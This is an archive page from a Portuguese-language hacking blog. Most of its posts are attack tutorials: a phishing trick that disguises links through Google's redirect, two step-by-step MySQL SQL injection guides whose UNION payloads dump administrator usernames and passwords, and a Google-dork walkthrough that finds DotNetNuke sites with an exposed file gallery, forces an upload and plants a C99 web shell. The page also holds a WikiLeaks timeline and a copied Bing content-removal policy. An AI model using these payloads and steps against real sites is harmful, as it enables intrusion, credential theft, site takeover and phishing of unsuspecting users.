Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador aprenda. Mostrar todas as postagens
Mostrando postagens com marcador aprenda. Mostrar todas as postagens

segunda-feira, 7 de março de 2011

Attack phishing com redirecionamento google.



Utilizando o redirecionamento de links  do Google para attack phishings, como fazer isso é muito simples.

È simples assim:
http://www.google.com/url?q= + SEU LINK
ex:
http://www.google.com/url?q=http://blog.inurl.com.br
Com essa junção você e direcionado para uma pagina na qual ganhara um link com nome do sua pagina , com a seguinte frase:
 A página na qual você estava está tentando levar você para http://blog.inurl.com.br.
Copiando o link interno da tag http://blog.inurl.com.br. Temos acesso, á

Pronto seu link de redirecionamento.

sexta-feira, 25 de fevereiro de 2011

O que você sabe sobre o Wikileaks?




  • Julian Assange, fundador da instituição (WikiLeaks), procura se estabelecer na Suécia pelas suas leis de proteção a jornalistas, então  é acusado de crimes sexuais e teve de deixar o país.



  • O site WikiLeaks sofreu ataques do tipo DDoS (Denial of Service), que fizeram com que ficasse fora de funcionamento por muitas horas.



  • Depois dos ataques DDos, a WikiLeaks contratou serviços da Amazon que poderiam tratar adequadamente dos ataques, mas a Amazon rompeu contrato e expulsou a WikiLeaks de seus domínios.



  • O serviço que redireciona os usuários (DNS) para os servidores da WikiLeaks foi desativado, fazendo assim com que o domínio original “wikileaks.org” não funcional.



  • A Suécia emite um mandado de prisão contra Julian Assange.



  • A Interpol (polícia internacional, representada em 188 países) emite um alerta vermelho contra Julian Assange, o que significa que ele deve ser preso se encontrado.



  • O serviço de pagamentos eletrônicos no qual a WikiLeaks utilizava para receber fundos de todo o mundo, congela a conta da instituição, deixando retidos 70 mil euros.



  • A Suécia congela a conta bancária de Julian Assange.



  • Julian Assange é preso na Inglaterra.



  • Julian Assange tem pedido de fiança negado.



  • O serviço alternativo de transferência de fundos para WikiLeaks que utiliza cartão de crédito (Visa Mastercard) é cancelado.



  • Ataques verbais a instituição WikiLeaks e seu fundador Julian Assange, inclusive com incitação a violência contra os mesmos.



  • O site do grupo de hackers favoráveis a WikiLeaks denominado Anonops foi retirado de funcionamento (anonops.net).



  • O perfil no Twitter do grupo Anonops foi excluído.



  • O perfil do Facebok do grupo Anonops foi excluído.



  • A página com manual do grupo Anonops foi excluído.



  • O endereço temporário anonops.info foi excluido.



  • Dois adolecentes que apoiaram as operações PayBack foram presos na Suécia.



  • Força Área americana bloqueia acesso de algumas instituições e pessoas a WikiLeaks.



  • EUA iniciam operação para prender Assange.



  • EUA prendem manifestantes pró WikiLeaks em Washington.



  • Bank of America inicia operação contra WikiLeaks.



  • CIA cria esquadrão para combater WikiLeaks.



  • EUA obrigam o Twitter a revelar informações de usuários da conta WikiLeaks.



  • WikiLeaks Brasil tem duas vezes tentativas de seqüestro de seus serviços de e-mail.



  • Ex banqueiro que entregou dados a WikiLeaks é acusado na Suíça.



  • O grupo AnonOps sofre ataques da mídia quanto a responsabilidade de suas ações.



  • Governo Britânico prende 5 pessoas por apoiar WikiLeaks.


  • Estatísticas
    • 6 Ataques a infra estrutura.
    • 4 Ataques a mobilização financeira.
    • 17 Ataques contra liberdade individual.
    • 7 Ataques a entidades de apoio.

    terça-feira, 15 de fevereiro de 2011

    Tutorial como invadir com SQL Injection (MySQL), sql injection por method $_GET e $_POST, programa para sqlinjection

    Tutorial como invadir com SQL Injection (MySQL), sql injection por method $_GET e $_POST, programa para sqlinjection


    O que é Sql Injection?
    É uma vulnerabilidade existente nos dias de hoje, que si usa de uma manipulação em  códigos sql. Esta vulnerabilidade permite ao atacante executar consultas ao banco de dados inserindo querys (comandos Sql) na url do site ou ate mesmo em campos de text. obtendo, assim, informações confidenciais como logins e senhas, dentre outros.
    Hoje em dia são usadas muitas técnicas para explorar um banco de dados de um site servidor… Citarei algumas das técnicas.
    1 – Sql Injection
    A) Verificar a si existe uma Vulnerabilidade sem programa.
    Vou citar um exemplo básico, para si saber si existe uma vulnerabilidade. Suponhamos que existe um site chamado “ALVO”, e esse site contem dados enviados por variáveis URL.
    Código:
    http://www.alvo.com/news.php?id=5
    No caso acima, o nome do site é www.alvo.com, Toda vez que você ver no link de um site o sinal de interrogação seguido de alguma palavra,letra,silaba recebendo algum valor, isso quer diser que existe um dado sendo enviado de uma pagina para outra. Exemplo: ?id=5.
    Isso significa que neste caso, a pagina news.php estará recebendo o.
    Concerteza na pagina, chamada news.php terá um código, parecido com esse:
    $id       =$_post[‘id’];
    E obviamente terá um código sql, parecido com esse.
    Query_rs        = “select *  from noticias where código=’$id’”
    Isso significa que a pagina news.php esta selecionando a noticia em que o codigo da noticia seja igual ao codigo da URL, que seria a variavel $id.
    Agora, vamos a parte para identificarmos se o site é vulnerável, colocaremos ao final da url uma aspa simples ( ‘ ). Abaixo é mostrado a forma como a url ficará.
    Código:
    http://www.alvo.com/news.php?id=5′
    Caso o site retorne um erro igualmente ou semelhante ao apresentado a seguir. O site é vulnerável a Sql Injection
    Erro:
    “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the…
    O erro acima diz que a sintase da consulta sql esta incorreta. e pede para você checar o manual correspondente ao SGBD que você está utilizando. “Até parece que você é o administrador do site”
    Agora que checamos o erro no site e sabemos que este é vulnerável a injeção de Sql na url. Agora Iremos aprender a explorar esta vulnerabilidade. Com alguns macetes:
    B) – Localizar a Quantidade/Número de Colunas/Tabelas do banco de dados.
    Utilizaremos uma forma bastante simples para descobrir a quantidade de colunas existentes na tabela. Para encontrar a quantidade de Colunas/Tabelas é utilizado o comando ORDER BY, esse comando é colocado no fim da sintase sql, significa ordenar em formas descendente, ascendente dentre outras a suas consulta.
    Mas como utilizar este comando Sql?
    Ao final da url você adiciona o comando order by e vai adicionando uma sequência de Colunas, ou seja, você pode acionar a coluna correspondente. Caso queira olhar a coluna 1, ordene assim:
    Código:
    http://www.alvo.com/news.php?id=5 order by 1
    Se não aparecer nenhum erro é por que esta Coluna número 1 existe. Para localizar a quantidade de colunas basta ir tentando ordenar todas as colunas de 1 a infinito.  Lembre-se que esta vulnerabilidade necessitamos trabalhar em cima dos erros, então o ideal é você ir acrescentado valor até que o site retorne um erro dizendo que a Coluna é inexistente no banco de dados.
    Código:
    http://www.alvo.com/news.php?id=5 order by 1/* <– Sem erro
    http://www.alvo.com/news.php?id=5 order by 1,2/* <– Sem erro
    http://www.alvo.com/news.php?id=5 order by 1,2,3/* <– Sem erro
    http://www.site.com/news.php?id=5 order by 1,2,3,4 <– Com erro
    O exemplo acima, é atribuido Colunas (1..2..3..4), no entanto, é mencionado erro na Coluna 4. Conclui-se então que esta Coluna é inexistente e que o banco possui apenas 3 Colunas.
    C) – Utilizando a função UNION.
    Esta função poderosa é responsável por unir vários dados localizados em Colunas de Tabelas diferentes. “Essa é muito boa”
    Vamos utilizar o exemplo abaixo para melhor exemplificar.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,2,3
    Explicando a Sql:
    O exemplo acima vai possibilitar ao “Injectador” visualizar todas as informações contidas nas Colunas/Tabelas 1, 2 e 3 do banco.
    Código:
    …?id … union all select 1,2,3
    Faça a união de todas as informações contidas das Colunas/Tabelas 1, 2 e 3 do site: http://www.alvo.com/news.php. Está e a ordem que você atribui ao comando colocado na url do site.
    D) – Descobrindo a versão do SGBD (MySql).
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,2,3
    Observe acima que na url o comando Sql pede para visualizar as três Colunas/Tabelas existentes no banco. Agora para visualizar a versão do banco é necessário que façamos uma substituição. Retirar a Coluna/Tabela 2 pelo comando @@version.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,@@version,3
    Caso não der certo, você receberá uma mensagem de erro semelhante a esta:
    Citação:
    “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
    Para resolver este erro vamos utilizar a função convert(). Exemplo abaixo:
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/
    Ou então as funções hex() e unhex();
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/
    Com os procedimentos acima, você irá conseguir achar a versão do SGBD MySql.
    E) – Obtendo o nome da Coluna/Tabela.
    Agora que temos a versão, iremos ao passo seguinte. Descobrir o nome das Colunas/Tabelas:
    Geralmente os DBA’s (Administradores de Banco de Dados) utilizam nomes comuns como padronização para suas Colunas/Tabelas como:
    Citação:
    user, usuario, admin, member, membro, password, passwd, pwd, user_name
    Lógico que isto depende bastante de DBA’s e qual tipo de padronização ele estiver utilizando.
    Na consulta abaixo o “Injectador” bicuda, isto mesmo ele utiliza a técnica de tentativo-erro, para tentar acertar o nome da Coluna/Tabela.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,2,3 from admin
    Observe que acima a query diz: “Mostre-me os valores das Colunas/Tabelas 1, 2 e 3 do usuário admin”.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,username,3 from admin
    Caso apareça erro, vá mudando o nome da coluna… afinal é a técnica da tentativa e erro.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,username,3 from admin/
    Acima, observe que a consulta começa a ficar refinada: “Mostre-me os valores Coluna/Tabelas 1, o nome do usuário e 3 do usuário admin”. Ou seja, suponha que o DBA tenha criado um banco onde as ele separou a Tabela admin, como o exemplo. No entanto, este admin possui inumeras informações (campos) como: nome do admin (username), password, endereco, idade.. etc.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,username, password from admin
    Caso a consulta der certo, na tela aparecerá o nome do usuário e a senha. Esta senha aparecerá na tela tanto como texto ou criptografada, em md5 hash.. etc. Vai depender muito da base de dados onde foi desenvolvido o banco.
    Para ficar com um boa aparência e organizada as informações na tela. É utilizado a função concat().
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
    Dependendo do campo, fica a seu critério inserir em hexadecimal (0x3a) ou utilizando o padrão Ascii (char(58)).
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
    Na tela já aparecerá os valores com o nome do usuário administrador e a senha. Faça orações para que não aparece em hash md5 senão vai ser outra guerra..
    Dica: Quando está difícil para achar o nome da Coluna/Tabela, sempre é bom utilizar mysql.user, pois é muito utilizado como default e como padrão. Exemplo abaixo.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
    F) – MySql 5.
    Devido algumas diferenças atribuídas a versão 5 do MySql. É mostrado aqui uma técnica para obter o nome das Colunas/Tabelas.
    Nesta nova versão, é acrescentada um arquivo chamado information_schema, onde possui informações sobre todas as Colunas/Tabelas do banco. É este arquivo que será o nosso alvo.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
    Na consulta acima substituimos o campo 2 por table_name para obter a primeira tabela de information_schema.
    Agora para que a consulta seja rápida é necessário acrescentar um limite para as linhas.
    Observer abaixo que é colocado como limite 0, 1.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
    OBS: você deve ir acrescentando os valores dos limites: 1, 2; 3,4. Vai depender de você, pois vamos supor que o alvo principal é a Coluna/Tabela admin_password e está está na posição 43, então você deveria acrescentar uma por uma até achar… 1, 2; …, …; 42, 43.
    Espero que tenham entendido esta parte.
    Para obter o nome das colunas, também é utilizado a mesma lógica. Só que agora no arquivo information_schema.columns.
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    Agora vamos a uma consulta mais específica. Caso você queira que apareça informações mais específica como o nome dos usuário pode-se fazer a consulta abaixo:
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/
    Com esta consulta é visualizado o nome das colunas.. agora é só utilizar os limites para visualizar os nomes de usuários.
    Caso os valores estejam em colunas diferentes (lugares) vamos concatenar utilizando o concat().
    Código:
    http://www.alvo.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
    Ferramenta de auxílio
    SQL Injection 1.2 + Firefox.
    https://addons.mozilla.org/pt-BR/firefox/addon/6727
    Para dá apoio/auxílio na injeção dos códigos da SQL Injection, aqui é mostrado um complemento do Firefox que pode ajudá-lo bastante nesta tarefa.
    O SQL Injection 1.2 que é uma complemento que nos ajuda a inserir códigos tanto em Post quanto em Get. Além de você pode memorizar todas as entradas que você adquirir, sem a necessidade de utilizar o Crtl + c e Crtl + v.
    Abaixo as ilustrações mostram a facilidade de uso da ferramenta.
    Acima simplesmente pedimos para mostrar o usuário, a senha e o email.
    Isto é um exemplo de Sql Injection Avançado. Não é uma técnica tão simples, necessita-se de prática e conhecimento em Sql.
    Para quem sabe manejar bem o sql, concerteza que com este simples tutorial, aprenderá coisas a mais do que estou ensinando. Aprenderá que para fazer um sql injection basta injetar um código em outro código.
    Espero que todos tenham entendido pelo menos a essência da coisa.
    0
    A imagem 01 mostra o ícone no campo inferior do Browser. Para darmos início a execução do complemento é necessário dar um clique em cima do ícone (cadeado).
    1
    A imagem 02 mostra o complemento em si. Observe que não tem muito mistério, um campo para a escolha da String/Query e dois botões de escolha.
    2
    A imagem 3 mostra que o complemento já vem com algumas Strings, as Query’s que aparecem eu mesmo adicionei.
    Mas como funciona?
    3

    A imagem 04 mostra que o SQL Injection 1.2 já fez a limitação dos campos que podem vir a receber os Strings, que na ilustração acima correspondem a Usuário, Senha, Entrar.
    Para inserir é necessário que você clique em cima de qualquer um dos 3 campos do site.
    juancarloscunha
    A imagem 05 aparece logo após você clicar no campo desejado. Então você pode fazer a escolha de fazer a injeção por POST ou por GET.
    juancarloscunha
    Na imagem 06 você agora deve escolher em qual campo será inserido a String. Para isto você deve optar em clicar em um dos dois botões:
    O botão Injection Code possibilita inserir a String apenas no input que você clicou anteriormente.
    O botão Injection in all possibilita que a String seja inserida em todos os campos do site.
    Observe que eu clique no botão Injection in all.
    Pronto, logo após para iniciar a injeção basta clicar no tão Submit this form.


    Fonte:http://juancarloscunha.wordpress.com/2009/08/19/tutorial-como-invadir-com-sql-injection-mysql-sql-injection-por-method-_get-e-_post-programa-para-sqlinjection/ 

    domingo, 30 de janeiro de 2011

    Sql Injection - Aprenda e evitar

    Sql Injection - Aprenda e evitar


    O objetivo do post é apenas mostrar o perigo de um script que permite a exploração dessa falha.


    Acredito que muita gente se preocupa mais com a manipulação da string de SQL quando se trata de uma tela de login, onde o usuário digita seu login e senha para ter acesso a uma área restrita de um sistema.


    Porém o problema pode ser muito mais grave, do que permitir o acesso a uma área restrita. Um exemplo seria esse mesmo sistema de produtos ou de blog, que receba por GET/POST qual produto mostrar ou qual post o leitor irá visualizar. Se essa string recebida puder ser manipulada um grande estrago pode ser feito. Acho que todos já sabem disso e já leram em diversos lugares.


    Mas aqui o objetivo é mostrar como realmente fazer isso e também mostrar uma ferramente que automatiza isso, com o intuito de você testar suas urls para verificar a presença desse tipo de falha.


    O código que será postado é um exemplo de um script COM FALHA.
    A explicação que você vai ler abaixo foi tirado do site:
    [ http://wordsecurity.wordpress.com/2009/12/16/tutorial-mysql-injection/ ]


    A ferramenta na qual falei que faz isso de forma automática é a "SqliHelper", que você pode enconrar nesse site: http://reiluke.i.ph/


    Aqui segue um passo-a-passo como utilizar a ferramenta:


    Onde tem target coloque esse link: http://localhost/index?mes=12&ano=2009


    Click em cada um dos botões, um de cada vez:
    Inject => Vai testar se o site eh vulneravel
    Get Database => Vai aparecer os nomes dos bancos no servidor
    Get Tables => Vai mostrar as tabelas do banco de dados q vc selecionou
    Get Columns => Vai mostrar as colunas da tabela q vc escolheu


    Agora Selecione todos os campos da tabela e por ultimo click em: Dump Now


    Você verá que caso uma tabela que contenha senhas, e essas senhas não for criptografada, o invasor terá TODAS as senhas. É importante que você sempre guarde as senhas no banco de forma criptograda, dessa forma mesmo que um usuário tenha acesso as senhas ele não conseguirá ler.


    Existe um post no site que fala exatamente como criar uma senha criptografada de forma SEGURA!


    http://www.codigopronto.com.br/codigo-ler/7/gera-um-hash-com-salt-aleatorio




    ----------------------------------------------------------------------
    [Tutorial] MySQL Injection [ http://wordsecurity.wordpress.com/2009/12/16/tutorial-mysql-injection/ ]


    Então , como muitos sabem uma das falhas de programação web mais encontrada na internet é de banco de dados SQL .
    O que posso dizer é que para explorar não necessita de um tipo especifico de requisição ( Post ou Get ) .


    Portanto vamos ao tutorial :


    Antes de mais nada não é necessariamente necessario algum erro de consulta para saber se esta realmente vul , e sim sua interpretação…


    Erros de consultas no mysql_error() para possivelmente vuls , por exemplo :
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/renan/public_html/noticias.php on line 211

    &

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘” at line 1


    No caso ah erro na consulta , mas não siginifica que em todos sites estaram mostrando .
    Muitos dizem que só é possivel explorar caso lhe retorne algum erro , mas nem sempre é necessario…


    $id = $_GET;
    $q = "SELECT * FROM informativos WHERE id = '$id'";
    $r = mysql_query($q) or die(mysql_error());
    ?>


    #################################################


    Vamos a pratica :
    Se adicionarmos no final de um string uma simples aspas ela ira modificar a syntax retornando algum daqueles erros acima ou não modificaria a pagina.
    Nossa query de consulta com aspas no fim da string de um site seria:
    SELECT * FROM informativos WHERE id = '3''


    Achando Colunas
    Voce pode usar duas formas de achar as colunas , por “order by” ou “union+all+select+” .


    No caso de “order by” voce fica procurando até aparecer o erro ” unknown column ‘5? in ‘order clause’ ” .
    Ja no ” union+all+select+ ” voce adicionaria o numero de strings que representa a qtd de colunas daquele query .
    Exemplo
    Aqui temos um site onde a quantidade de colunas nos retornara umas string na pagina .
    www.site.com.br/informativos.php?id=3+union+all+select+1 Nada

    www.site.com.br/informativos.php?id=3+union+all+select+1,2 Nada

    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3 Nada

    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4 Nada

    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5 strings de ex 2,3 e 4


    Mas em outros sites voce com esse mesmo tipo de consulta as colunas o erro seria :
    ” The used SELECT statements have a different number of columns “


    ——————————————————————–


    Informações do host
    version() => versão do MySQL
    database() => nome do banco de dados da query
    user() ou system_user() => usuario do banco de dados
    now() => hora e data atual


    Exemplo:
    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,version(),5

    5.0.54-log



    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,database(),5

    renan



    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,user(),5

    [email protected]



    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,now(),5

    2009-08-28 23:19:41


    ——————————————————————–


    Achando Tabelas
    Para se achar as colunas acho facil e voce ira compreender meu raciocineo.
    Por exemplo voce poderia usar metodo de chute( brute ) de tabelas ou Dumpea-las , mas quando usa-las ?
    A nossa resposta é de que versões anteriores do MySQL abaixo de 5.x.y não se pode dumpear então seria por chute , só que versões acima ou ela mesmo voce utiliza o metodo
    de achar as colunas por meio de information_schema ( dumpear ) .


    concat concatenar = colocar em ordem


    group_concat() => busca tudo o que deseja juntamente com caracters em hexadecimal
    concat() => busca o que deseja juntamente com caracters em hexadecimal
    concat_ws() => une


    -> No caso de chute ( brute ) voce utilizaria ” +from+ :
    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,4,5+from+Renan


    Se não houver a tabela de nome “Renan” ira nos retornar o erro ” Table ‘database.renan’ doesn’t exist “
    Se houver nos retornaria a pagina com as mesmas strings de achado as colunas .


    -> No caso de Dumpear :
    Temos 2 jeitos bem faceis que voce pode escolher.


    =====—————————————————-=====


    1º Metodo:
    Nesse metodo as tabelas estam em hexadecimal.


    renan_usuarios 0x72656e616e5f7573756172696f73


    Temos então um site onde queremos pegar todas as tabelas .
    www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(table_name),5

    +from+information_schema.tables where table_schema=database()--
    Retornaria-nos as seguintes tabelas postas na pagina :
    adm_area,amado_agenda_fotos,amado_cadastros,amado_fotos,amado_usuarios,site_mp3,site_testemunhe,etc.



    Comandos:
    group_concat(table_name)

    +from+information_schema.tables+where+table_schema=database()--


    Agora temos de encontrar as colunas de uma determinada tabela .
    www.site.com.br/informativos.php?id=null+union+all+select+1,2,3,group_concat(column_name),5

    +from+information_schema.columns+where+table_name=0x72656e616e5f7573756172696f73
    Retornaria-nos as seguintes colunas postas na pagina de uma tabela :
    id,login,senha,email,status


    Comandos:
    group_concat(column_name)
    +from+information_schema.column+where+table_schema=database()--


    =====—————————————————-=====


    2º Metodo:
    Nesse metodo as tabelas estam em decadecimal
    Usaremos o limit que funcionara para selecionar as linhas conforme o database
    +limit+0,1–

    +limit+1,2–

    +limit+2,1–

    +limit+3,2–

    +limit+4,3–
    etc…


    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(table_name),5

    +from+information_schema.tables+limit+0,1--
    Retornaria-nos a seguinte tabelas posta na pagina :
    CHARACTER_SETS
    Para poder achar as tabelas de logins voce alternaria o limit como acima.
    Comandos:
    concat(table_name)

    +from+information_schema.tables+limit+0,1--



    renan_usuarios char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)


    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,concat(column_name),5

    +from+information_schema.columns where table_name=

    char(114,101,110,97,110,95,117,115,117,97,114,105,111,115)+limit+0,1--
    Retornaria-nos a seguinte coluna posta na pagina de uma tabela :
    id
    Para poder achar as colunas da tabela voce alternaria o limit como acima.
    Comandos:
    concat(column_name)

    +from+information_schema.columns where table_name=char(tabela_em_decimal)+limit+0,1–


    e por fim mostrando os dados de logins
    www.site.com.br/informativos.php?id=3+union+all+select+1,2,3,

    concat(login,0x20,senha),5+from+renan_usuarios

    Fonte:http://www.codigopronto.com.br/

    domingo, 23 de janeiro de 2011

    Scanneando com strings google e Invadindo site

    Scanneando com strings google e Invadindo site

    Com esse tutorial simples é rápido vamos aprender como fazer upload em sites rapidamente e depois ter acesso

    Etapa 01 -
    Acesse o www.google.com.br

    Etapa 02 -
    A busca use o código de pesquisa sabiamente.
    Procure pelo seguinte termo
    Código:
    inurl:/tabid/36/language/en-US/Default.aspx

    Etapa 03 -
    Com a busca efetuada Aproximadamente 582 resultados (0,25 segundos) escolha um site de sua preferencia,
    e substitua o termo "/tabid/36/language/en-US/Default.aspx" por,
    Código:
    /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

    Exemplo:
    www.site.com.br/tabid/36/language/en-US/Default.aspx      -01

    www.site.com.br/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx -02


    Etapa 04 -Você vai ter um link page.So Gallary onde pode criar urls para dentro dos site
    Etapa 05 -Não faça nada por enquanto, abordando fase final.
    "A caixa e parecida com essa."
    PART 01 Scanneando com strings google e Invadindo site


    Etapa 06 -
    Agora substitua a URL na barra de endereços com um simples script
    "delete o endereço do site e cole o código abaixo"
    Código:
    javascript:__doPostBack('ctlURL$cmdUpload','')

    "Depois do script inserido na barra de endereços a caixa fica assim"
    PART 02 Scanneando com strings google e Invadindo site



    Etapa 07 -
    Você vai encontrar a opção de Upload

    Etapa 08 -
    Selecione Raiz
      
    Etapa 09 -
    Envie seu pacote de Seu Shell C99, C100 etc..


    OBS: todos esse processos foram feitos para que entenda como funciona
    podemos ir deireto á fonte também.
    Código:
    intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

    ou

    Código:
    *Fck/fcklinkgallery.aspx 

     ou

    Código:
    intitle:"Link Gallery" +fcklinkgallery ext:aspx

    sexta-feira, 21 de janeiro de 2011

    Como o Bing fornece resultados de pesquisa



    O Bing verifica automaticamente (ou "rastreia") a Internet para desenvolver e manter um índice. O índice é realmente um catálogo de recursos online disponíveis, incluindo sites, imagens, vídeos, documentos e outros itens. Os resultados de pesquisa específicos são criados usando um algoritmo de computador para corresponder os termos de pesquisa que você inserir com os resultados mais pertinentes e úteis em nosso índice. Em geral, tentamos fornecer uma coleção de informações online o mais abrangente e útil possível. Desenvolvemos algoritmos para fornecer os resultados mais pertinentes e determinar quais resultados são exibidos para determinada pesquisa.
    O Bing não controla a operação ou o design dos sites que indexamos. Também não controlamos o que esses sites publicam. Desde que o site continue disponibilizando informações na Web, as informações geralmente estarão disponíveis para outros através do Bing ou outros serviços de pesquisa.
    Em casos limitados, para conformidade comleis aplicáveis e/ou para atender a preocupações de política pública, como privacidade, proteção de propriedade intelectual e a proteção de crianças, podemos remover recursos específicos do índice de informações disponíveis. Em cada caso em que formos exigidos a fazê-lo por lei, tentaremos limitar nossa remoção de resultados de pesquisa a um conjunto limitado de circunstâncias, de modo a cumprir com a lei aplicável, mas não restringir excessivamente o acesso de usuários do Bing a informações pertinentes.
    Estes são as formas pelas quais o Bing faz isso e quando.

    Como ajudamos a parar a distribuição de conteúdo de abuso infantil

    Infelizmente, o abuso infantil não é novidade, mas a Internet apresenta diversas oportunidades novas para aqueles que cometem crimes contra crianças, inclusive tráfico de imagens de abuso sexual. O Bing trabalha com as autoridades policiais e outras autoridades para ajudar a parar o fluxo desse conteúdo online. Uma das formas pelas quais fazemos isso é removendo informações disponíveis de nossos resultados de pesquisa em nossos links de resultados de pesquisa, que foram revisados por agências renomadas e detectados como tendo ou relacionados ao abuso infantil.
    Especificamente, removemos de nossos links de resultados de pesquisa, que foram identificados pela Internet Watch Foundation (Reino Unido), NCMEC (EUA), FSM (Alemanha) como, de acordo com seu julgamento de boa-fé, hospedando ou fornecendo acesso a conteúdo de abuso infantil ilegal sob as leis de suas juridisções. A remoção desses links dos resultados de pesquisa não os impede de serem acessados na Internet ou descobertos por meios que não o Bing, mas reduz a capacidade dessas pessoas que buscam conteúdo sobre abuso infantil de localizá-lo, além de reduzir a extensão na qual os vendedores de tal conteúdo podem lucrar com ele.
    Removemos esses tipos de links apenas quando temos certeza de que o governo ou agência governamental semi-oficial fornecendo o link é:
    • Uma organização renomada e confiável.
    • Limita o escopo de seu trabalho a conteúdo ilegal sobre abuso infantil.
    • Fornece alguma medida de recurso (como capacidade de apelação) se o conteúdo ou sites hospedando tal conteúdo forem bloqueados incorretamente.

    Como protegemos a propriedade intelectual

    Em muitos países, incluindo os Estados Unidos, os provedores de busca são obrigados a responder a reclamações de titulares de direitos sobre postagem, distribuição ou outra publicação de conteúdo protegido não autorizada. A comunidade internacional reconhece que tal publicação não autorizada pode infringir os direitos de proprietários de conteúdo e fez com que tratados internacionais e leis locais solucionassem o problema. De acordo com essas leis, e em apoio às nossas próprias diretivas incentivando o respeito pela propriedade intelectual, podemos remover determinados links de nosso índice, mediante aviso dos titulares dos direitos.
    O Bing reconhece que os direitos de proprietários de conteúdo existem, além dos direitos de usuários, e que a criatividade e a inovação online devem ser incentivadas. Para esse fim, o Bing ajudou a desenvolver um conjunto de princípios em relação a aplicativos de conteúdo gerados por usuários (alguns dos quais geram links que catalogamos em nosso serviço de pesquisa). Saiba mais sobre esses princípios no endereço http://www.ugcprinciples.com. Também aceitamos contranotificações de terceiros que são contra a remoção de seu conteúdo.

    Como lidamos com alegações de calúnia ou difamação

    Da mesma forma, os países no mundo inteiro têm adotado leis e procedimentos para lidar com difamação, calúnia e outros danos relacionados a falsas declarações feitas ou implícitas como sendo reais e que podem gerar uma percepção negativa sobre uma pessoa, negócio ou outra empresa. Não removemos recursos contendo conteúdo alegadamente difamatório de nosso índice sem uma ordem judicial, indicando que um link específico foi considerado difamatório. Quando recebemos uma ordem judicial válida, removemos esses links definitivamente de nosso índice.

    Como trabalhamos para impedir a invasão de privacidade

    Periodicamente, as páginas da Web disponibilizadas publicamente terão, intencionalmente ou por engano, informações privadas publicadas sem o consentimento da pessoa identificada ou em circunstâncias que criam riscos de segurança ou privacidade. Entre os exemplos estão publicação por engano de registros públicos, números de telefone particualres, números de identificação e semelhantes, ou a publicação intencional de senhas de email, credenciais de login, números de cartão de crédito ou outros dados com intenção de serem usados para fraude ou ação de hackers.
    O Bing não controla os sites que publicam essas informações ou o que eles publicam. Na maior parte do tempo, o site está na melhor posição para solucionar quaisquer problemas de privacidade sobre as informações que publica. Desde que o site continue disponibilizando informações na Web, as informações estarão disponíveis para outros. Assim que o site tiver removido as informações e tivermos rastreado o site novamente, ele não será mais exibido em nossos resultados.
    Se as informações já tiverem sido removidas desse site mas ainda estiverem sendo exibidas nos resultados de pesquisa do Bing, você poderá solicitar a nossa remoção das informações usando nosso formulário de solicitação de remoção de conteúdo.

    Como lidamos com spam na Web

    Algumas páginas capturadas em nosso índice podem ser páginas de pouco ou nenhum valor para usuários e também podem ter características que manipulam artificialmente a forma como os sistemas de publicidade e pesquisam trabalham, a fim de distorcer sua relevância em relação às páginas que oferecem informações mais relevantes. Algumas dessas páginas incluem apenas anúncioos e/ou links para outros sites que contêm praticamente anúncios e nenhum ou apenas conteúdo superficial pertinente ao assunto da pesquisa. Para melhorar a experiência de pesquisa para clientes e fornecer conteúdo mais pertinente, removemos tais páginas do índice de uma só vez, ou ajustamos nossos algoritmos para priorizar páginas mais úteis e pertinentes em conjuntos de resultados.

    Como lidamos com leis específicas para países individuais

